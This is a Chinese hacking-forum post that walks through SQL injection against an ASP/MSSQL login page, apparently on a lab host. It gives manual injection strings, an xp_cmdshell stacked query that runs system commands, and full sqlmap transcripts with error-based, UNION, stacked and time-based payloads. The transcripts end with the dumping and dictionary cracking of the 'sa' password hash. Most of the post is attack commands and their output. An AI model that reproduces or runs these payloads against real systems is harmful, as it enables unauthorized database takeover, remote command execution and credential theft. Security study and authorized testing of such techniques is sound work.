切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
273 SQLMAP POST[复制链接]
发表于 2012-9-15 23:27:56 | 显示全部楼层 |!read_mode!

RE:
http://www.cao.com/forum.php?mod=viewthread&tid=610&extra=page%3D1  MSSQL SQL INJ

抓包分析

观察提交页面源码,看看是什么方式提交

  1. <form name="frmLogin" action="login.asp" method="post">
  2. Username: <input type="text" name="userName">
  3. Password: <input type="text" name="password">
  4. <input type="submit">
  5. </form>
复制代码
很明显是post方式,我们得抓到提交的POST数据,用到了firefox的插件,如下图:


手工检测有了数据包就好搞了,下面我们手工检测一下
继续提交注入语句:

  1. ---------------------------------
  2. 帐号:' having 1=1 ---
  3. 密码任意
  4. ---------------------------------
复制代码
返回:Logged In
提交注入语句:
  1. ---------------------------------
  2. 帐号:' having 1=2 ---
  3. 密码任意
  4. ---------------------------------
复制代码
返回
Bad Credentials
说明存在注入
我们提交:
帐号
  1. '; exec master..xp_cmdshell 'iisreset'; --
  2. 密码任意
复制代码
返回:
Microsoft OLE DB Provider for SQL Server 错误 '80004005'[DBNETLIB][ConnectionOpen (Connect()).]SQL Server 不存在或拒绝访问。/login.asp,行 14
其实是执行
  1. select userName from users where userName='';  exec master..xp_cmdshell 'iisreset'; --' and userPass=''
复制代码
自动化注入
下面我们直接用sqlmap进行注入
  1. root@Dis9Team:~# sqlmap -u "http://5.5.5.134/login.asp" --data "userName=123&password=123"

  2.     sqlmap/1.0-dev (r4911) - automatic SQL injection and database takeover tool

  3. http://www.sqlmap.org

  4. [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

  5. [*] starting at 21:13:27

  6. [21:13:27] [INFO] using '/pen/sqlmap-dev/output/5.5.5.134/session' as session file
  7. [21:13:27] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file
  8. [21:13:27] [INFO] testing connection to the target url
  9. [21:13:27] [INFO] heuristics detected web page charset 'ascii'
  10. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  11. ---
  12. Place: POST
  13. Parameter: password
  14.     Type: error-based
  15.     Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
  16.     Payload: userName=admin&password=admin' AND 8376=CONVERT(INT,(CHAR(58)+CHAR(99)+CHAR(104)+CHAR(99)+CHAR(58)+(SELECT (CASE WHEN (8376=8376) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(108)+CHAR(105)+CHAR(120)+CHAR(58))) AND 'YvOd'='YvOd

  17.     Type: UNION query
  18.     Title: Generic UNION query (NULL) - 1 column
  19.     Payload: userName=admin&password=-1537' UNION SELECT CHAR(58)+CHAR(99)+CHAR(104)+CHAR(99)+CHAR(58)+CHAR(117)+CHAR(84)+CHAR(86)+CHAR(119)+CHAR(105)+CHAR(109)+CHAR(100)+CHAR(101)+CHAR(122)+CHAR(114)+CHAR(58)+CHAR(108)+CHAR(105)+CHAR(120)+CHAR(58)--  AND 'WzKD'='WzKD

  20.     Type: stacked queries
  21.     Title: Microsoft SQL Server/Sybase stacked queries
  22.     Payload: userName=admin&password=admin'; WAITFOR DELAY '0:0:5';-- AND 'LmZG'='LmZG

  23.     Type: AND/OR time-based blind
  24.     Title: Microsoft SQL Server/Sybase time-based blind
  25.     Payload: userName=admin&password=admin' WAITFOR DELAY '0:0:5'-- AND 'ugPK'='ugPK

  26. Place: POST
  27. Parameter: userName
  28.     Type: error-based
  29.     Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
  30.     Payload: userName=admin' AND 1780=CONVERT(INT,(CHAR(58)+CHAR(99)+CHAR(104)+CHAR(99)+CHAR(58)+(SELECT (CASE WHEN (1780=1780) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(108)+CHAR(105)+CHAR(120)+CHAR(58))) AND 'tmdk'='tmdk&password=admin

  31.     Type: UNION query
  32.     Title: Generic UNION query (NULL) - 1 column
  33.     Payload: userName=-1984' UNION SELECT CHAR(58)+CHAR(99)+CHAR(104)+CHAR(99)+CHAR(58)+CHAR(107)+CHAR(121)+CHAR(122)+CHAR(100)+CHAR(68)+CHAR(71)+CHAR(84)+CHAR(87)+CHAR(98)+CHAR(105)+CHAR(58)+CHAR(108)+CHAR(105)+CHAR(120)+CHAR(58)--  AND 'CTkR'='CTkR&password=admin

  34.     Type: stacked queries
  35.     Title: Microsoft SQL Server/Sybase stacked queries
  36.     Payload: userName=admin'; WAITFOR DELAY '0:0:5';-- AND 'Nbcb'='Nbcb&password=admin

  37.     Type: AND/OR time-based blind
  38.     Title: Microsoft SQL Server/Sybase time-based blind
  39.     Payload: userName=admin' WAITFOR DELAY '0:0:5'-- AND 'EBhZ'='EBhZ&password=admin
  40. ---

  41. there were multiple injection points, please select the one to use for following injections:
  42. [0] place: POST, parameter: userName, type: Single quoted string (default)
  43. [1] place: POST, parameter: password, type: Single quoted string
  44. [q] Quit
  45. >
复制代码
这里提示选择用username 和PASSWORD表单提交注入语句 随便都性
我选择0,用username提交注入语句 得到的结果:
  1. > 0

  2. [21:14:33] [INFO] the back-end DBMS is Microsoft SQL Server
  3. web server operating system: Windows XP
  4. web application technology: ASP, Microsoft IIS 5.1
  5. back-end DBMS: Microsoft SQL Server 2005
  6. [21:14:33] [INFO] Fetched data logged to text files under '/pen/sqlmap-dev/output/5.5.5.134'

  7. [*] shutting down at 21:14:33
复制代码
目标数据库版本出来了获得数据
  1. root@Dis9Team:~# sqlmap -u "http://5.5.5.134/login.asp" --data "userName=123&password=123" --passwords

  2.     sqlmap/1.0-dev (r4911) - automatic SQL injection and database takeover tool

  3. http://www.sqlmap.org

  4. [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

  5. [*] starting at 21:15:45

  6. [21:15:45] [INFO] using '/pen/sqlmap-dev/output/5.5.5.134/session' as session file
  7. [21:15:45] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file
  8. [21:15:45] [INFO] testing connection to the target url
  9. [21:15:45] [INFO] heuristics detected web page charset 'ascii'
  10. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  11. ---
  12. Place: POST
  13. Parameter: password
  14.     Type: error-based
  15.     Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
  16.     Payload: userName=admin&password=admin' AND 8376=CONVERT(INT,(CHAR(58)+CHAR(99)+CHAR(104)+CHAR(99)+CHAR(58)+(SELECT (CASE WHEN (8376=8376) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(108)+CHAR(105)+CHAR(120)+CHAR(58))) AND 'YvOd'='YvOd

  17.     Type: UNION query
  18.     Title: Generic UNION query (NULL) - 1 column
  19.     Payload: userName=admin&password=-1537' UNION SELECT CHAR(58)+CHAR(99)+CHAR(104)+CHAR(99)+CHAR(58)+CHAR(117)+CHAR(84)+CHAR(86)+CHAR(119)+CHAR(105)+CHAR(109)+CHAR(100)+CHAR(101)+CHAR(122)+CHAR(114)+CHAR(58)+CHAR(108)+CHAR(105)+CHAR(120)+CHAR(58)--  AND 'WzKD'='WzKD

  20.     Type: stacked queries
  21.     Title: Microsoft SQL Server/Sybase stacked queries
  22.     Payload: userName=admin&password=admin'; WAITFOR DELAY '0:0:5';-- AND 'LmZG'='LmZG

  23.     Type: AND/OR time-based blind
  24.     Title: Microsoft SQL Server/Sybase time-based blind
  25.     Payload: userName=admin&password=admin' WAITFOR DELAY '0:0:5'-- AND 'ugPK'='ugPK

  26. Place: POST
  27. Parameter: userName
  28.     Type: error-based
  29.     Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
  30.     Payload: userName=admin' AND 1780=CONVERT(INT,(CHAR(58)+CHAR(99)+CHAR(104)+CHAR(99)+CHAR(58)+(SELECT (CASE WHEN (1780=1780) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(108)+CHAR(105)+CHAR(120)+CHAR(58))) AND 'tmdk'='tmdk&password=admin

  31.     Type: UNION query
  32.     Title: Generic UNION query (NULL) - 1 column
  33.     Payload: userName=-1984' UNION SELECT CHAR(58)+CHAR(99)+CHAR(104)+CHAR(99)+CHAR(58)+CHAR(107)+CHAR(121)+CHAR(122)+CHAR(100)+CHAR(68)+CHAR(71)+CHAR(84)+CHAR(87)+CHAR(98)+CHAR(105)+CHAR(58)+CHAR(108)+CHAR(105)+CHAR(120)+CHAR(58)--  AND 'CTkR'='CTkR&password=admin

  34.     Type: stacked queries
  35.     Title: Microsoft SQL Server/Sybase stacked queries
  36.     Payload: userName=admin'; WAITFOR DELAY '0:0:5';-- AND 'Nbcb'='Nbcb&password=admin

  37.     Type: AND/OR time-based blind
  38.     Title: Microsoft SQL Server/Sybase time-based blind
  39.     Payload: userName=admin' WAITFOR DELAY '0:0:5'-- AND 'EBhZ'='EBhZ&password=admin
  40. ---

  41. there were multiple injection points, please select the one to use for following injections:
  42. [0] place: POST, parameter: userName, type: Single quoted string (default)
  43. [1] place: POST, parameter: password, type: Single quoted string
  44. [q] Quit
  45. > 0

  46. [21:15:47] [INFO] the back-end DBMS is Microsoft SQL Server
  47. web server operating system: Windows XP
  48. web application technology: ASP, Microsoft IIS 5.1
  49. back-end DBMS: Microsoft SQL Server 2005
  50. [21:15:47] [INFO] fetching database users password hashes
  51. [21:15:47] [INFO] heuristics detected web page charset 'GB2312'
  52. [21:15:47] [INFO] the SQL query used returns 1 entries
  53. [21:15:47] [INFO] retrieved: "[u'sa', u'0x01004086ceb628aa51dd7e821560d52c6a6...
  54. do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y

  55. [21:15:50] [INFO] using hash method 'mssql_passwd'
  56. what dictionary do you want to use?
  57. [1] default dictionary file '/pen/sqlmap-dev/txt/wordlist.txt' (press Enter)
  58. [2] custom dictionary file
  59. [3] file with list of dictionary files
  60. > 1

  61. [21:15:52] [INFO] using default dictionary
  62. [21:15:52] [INFO] loading dictionary from '/pen/sqlmap-dev/txt/wordlist.txt'
  63. do you want to use common password suffixes? (slow!) [y/N] y

  64. [21:15:54] [INFO] starting dictionary-based cracking (mssql_passwd)
  65. [21:15:54] [INFO] starting 2 processes
  66. [21:15:55] [INFO] cracked password '123456' for user 'sa'                     
  67. database management system users password hashes:                              
  68. [*] sa [1]:
  69.     password hash: 0x01004086ceb628aa51dd7e821560d52c6a6b5dc187421c6e8057
  70.         header: 0x0100
  71.         salt: 4086ceb6
  72.         mixedcase: 28aa51dd7e821560d52c6a6b5dc187421c6e8057
  73.     clear-text password: 123456

  74. [21:15:55] [WARNING] HTTP error codes detected during testing:
  75. 500 (Internal Server Error) - 2 times
  76. [21:15:55] [INFO] Fetched data logged to text files under '/pen/sqlmap-dev/output/5.5.5.134'

  77. [*] shutting down at 21:15:55

  78. root@Dis9Team:~#
复制代码




附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-23 13:56

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部